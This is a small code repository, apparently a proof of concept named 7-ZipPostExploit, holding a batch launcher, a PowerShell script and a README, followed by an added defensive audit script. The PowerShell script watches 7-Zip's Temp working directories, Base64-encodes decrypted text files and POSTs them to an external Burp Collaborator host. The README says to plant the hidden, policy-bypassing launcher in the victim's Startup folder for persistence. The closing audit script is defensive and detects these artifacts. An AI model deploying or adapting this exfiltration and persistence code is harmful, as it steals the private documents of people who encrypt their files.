```
├── 7zipPostExp.bat
├── 7zipPostExp.ps1
├── README.md
└── index.html
```

/7zipPostExp.bat:

```bat
powershell.exe -executionpolicy bypass -windowstyle hidden -file ..\7zipPostExp.ps1
```

/7zipPostExp.ps1:

```powershell
# Author: Abdullah Alqeisi

# Logged-in user name; used to build the path to that user's Temp directory.
$username = $env:Username

# Uncomment if the username in the environment variable is two words and the one in the
# C:\Users directory is only the first name of the user (keeps the text before the first space).
<#$username = ""
foreach ($letter in $env:Username.ToCharArray()) {
    if($letter -ne ' '){$username += $letter}
    if($letter -eq ' '){break}
}#>

# Poll the Temp directory without end for the "Rar$..." working directories that 7-Zip
# creates while an encrypted archive is open for editing (see README).
while(1) {

    if(Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp | Where-Object { $_.Name -match 'Rar.........\..' }){

        foreach ($directory in (Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp | Where-Object { $_.Name -match 'Rar.........\..' })){

            # Each .txt file in the working directory is the decrypted content of an archived file.
            foreach ($filename in Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp\$directory\*.txt){

                $filecontent= Get-Content $filename
                $filecontentbytes = [System.Text.Encoding]::UTF8.GetBytes($filecontent)
                $B64EncodedContent = [System.Convert]::ToBase64String($filecontentbytes)

                # The Base64-encoded content is POSTed as a form field to the attacker-controlled server.
                $target = "https://fo70z55wxi56zxob33p9oiq8hznpbe.burpcollaborator.net" #CHANGE URL
                $postParams = @{payload=$B64EncodedContent}
                Invoke-WebRequest -Uri $target -Method POST -Body $postParams

            }

        }

    }

}
```

/README.md:

# 7-ZipPostExploit

**FOR ETHICAL ACTIVITY PURPOSES**

Tested on Version 19.00

7-Zip is a free and open-source file archiver, a utility used to place groups of files within compressed containers known as "archives". It is often used to encrypt sensitive file contents that are saved on disk.

After analysis of the application and the code, the process of opening a file and then re-encrypting it was understood.

1. User inputs the password to open/edit files in an encrypted archive.
2. 7-Zip makes a new directory in the C:\Users\%USERNAME%\AppData\Local\Temp directory. The new directory's name always starts with "Rar$" followed by randomly generated numbers.
3. 7-Zip decrypts the file(s) in the archive and places them in the above created directory, in plain text.
4. Once editing is done, 7-Zip will re-encrypt the data and save it on disk.
5. 7-Zip will delete the above created directory and delete the plain text files.

Between the moment a file is opened for editing and the moment it is closed, **the attacker has access to plaintext documents**.

## Script

The PowerShell script in this repo is a **PoC for exfiltrating sensitive data encrypted by 7-Zip** to an external attacker server. This is done in the **post exploitation** phase.

**Steps**
- Change the attacker's website in the script.
- Add the batch file to the target's Startup folder (C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup).
- Add the PowerShell script in the parent directory of the Startup folder (the batch file refers to it as `..\7zipPostExp.ps1`).

**To do**
- Add counters so that sent files are not resent to the attacker multiple times, generating unnecessary traffic.

/index.html:

(Empty file: only blank lines.)
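Defender-side check for the two artifacts the README and script above depend on: a Startup-folder launcher that starts PowerShell hidden with an execution-policy bypass, and `Rar$` working directories left in the user's Temp folder with decrypted files inside. This is an added example, not code from the 7-ZipPostExploit repository; it assumes the default Startup and `%LOCALAPPDATA%\Temp` paths named in the README and that launchers are `.bat`/`.cmd` files.

```powershell
# Added example (not part of the 7-ZipPostExploit repo): audits the current user's profile
# for the PoC's footprint and reports findings as objects.
# Assumptions: default Startup and %LOCALAPPDATA%\Temp paths (as in the README); launchers
# are .bat/.cmd files. Run it with 7-Zip closed: a Rar$ directory is expected only while an
# encrypted archive is open for editing, so one found afterwards still holds plaintext.

function Find-HiddenPowerShellLaunchers {
    param(
        [string]$StartupDir = (Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup')
    )
    Get-ChildItem -Path $StartupDir -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in '.bat', '.cmd' } |
        ForEach-Object {
            $text = Get-Content -Path $_.FullName -Raw -ErrorAction SilentlyContinue
            # The PoC launcher runs powershell.exe with policy bypass and a hidden window;
            # flag any launcher that does either (abbreviated switches included).
            if ($text -match 'powershell' -and
                $text -match '-(ep|exec\w*)\s+bypass|-w(indowstyle)?\s+hidden') {
                [pscustomobject]@{
                    Artifact = 'StartupLauncher'
                    Path     = $_.FullName
                    Detail   = ($text.Trim() -split '\r?\n')[0]
                }
            }
        }
}

function Find-RarTempDirs {
    param(
        [string]$TempDir = (Join-Path $env:LOCALAPPDATA 'Temp')
    )
    # 7-Zip's working directories for an open encrypted archive are named Rar$<digits>;
    # one that outlives the editing session still contains the decrypted files.
    Get-ChildItem -Path $TempDir -Directory -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -like 'Rar$*' } |
        ForEach-Object {
            $files = @(Get-ChildItem -Path $_.FullName -File -Recurse -ErrorAction SilentlyContinue)
            [pscustomobject]@{
                Artifact = 'RarTempDir'
                Path     = $_.FullName
                Detail   = "$($files.Count) file(s) still on disk, created $($_.CreationTime)"
            }
        }
}

$findings = @(Find-HiddenPowerShellLaunchers) + @(Find-RarTempDirs)
if ($findings.Count -eq 0) {
    Write-Output 'No hidden PowerShell launchers in Startup and no Rar$ directories in Temp.'
} else {
    $findings | Format-Table -AutoSize
}
```

A `RarTempDir` finding is the plaintext exposure window the README describes made persistent; securely deleting the directory and checking Startup for the launcher are the two follow-ups.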